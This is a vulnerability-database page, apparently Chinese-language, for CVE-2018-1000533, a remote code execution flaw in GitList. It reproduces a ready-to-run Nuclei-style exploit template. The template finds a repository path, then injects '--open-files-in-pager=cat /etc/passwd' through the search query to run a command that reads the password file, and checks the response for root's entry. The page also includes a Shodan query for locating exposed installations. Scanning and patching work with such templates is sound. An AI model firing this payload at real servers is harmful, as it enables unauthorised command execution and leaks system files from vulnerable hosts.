CVE-2018-1000533: GitList < 0.6.0 Remote Code Execution

日期: 2025-08-01 | 影响软件: GitList | POC: 已公开

漏洞描述

klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution.

PoC代码[已公开]

id: CVE-2018-1000533

info:
  name: GitList < 0.6.0 Remote Code Execution
  author: pikpikcu
  severity: critical
  description: klaussilveira GitList version <= 0.6 contains a passing incorrectly sanitized input via the `searchTree` function that can result in remote code execution.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade GitList to version 0.6.0 or later to mitigate this vulnerability.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
    - https://nvd.nist.gov/vuln/detail/CVE-2018-1000533
    - https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html
    - https://github.com/klaussilveira/gitlist/commit/87b8c26b023c3fc37f0796b14bb13710f397b322
    - https://github.com/superlink996/chunqiuyunjingbachang
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-1000533
    cwe-id: CWE-20
    epss-score: 0.93095
    epss-percentile: 0.99779
    cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: gitlist
    product: gitlist
    shodan-query: cpe:"cpe:2.3:a:gitlist:gitlist"
  tags: cve,cve2018,git,gitlist,vulhub,rce

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /{{path}}/tree/a/search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        query=--open-files-in-pager=cat%20/etc/passwd

    matchers:
      - type: word
        part: body
        words:
          - "root:/root:/bin/bash"

    extractors:
      - type: regex
        name: path
        group: 1
        regex:
          - '<span class="name">(.*?)</span>'
        internal: true
        part: body
# digest: 4b0a004830460221008b457c871cca152e2eda502790308879aca0064f4feee8ac26c1f74f32df108802210098eb3dd9a449b49627b7bb08ca162bf16a774d1700d743149848949699a91c2b:922c64590222798bb761d5b6d8e72950

相关漏洞推荐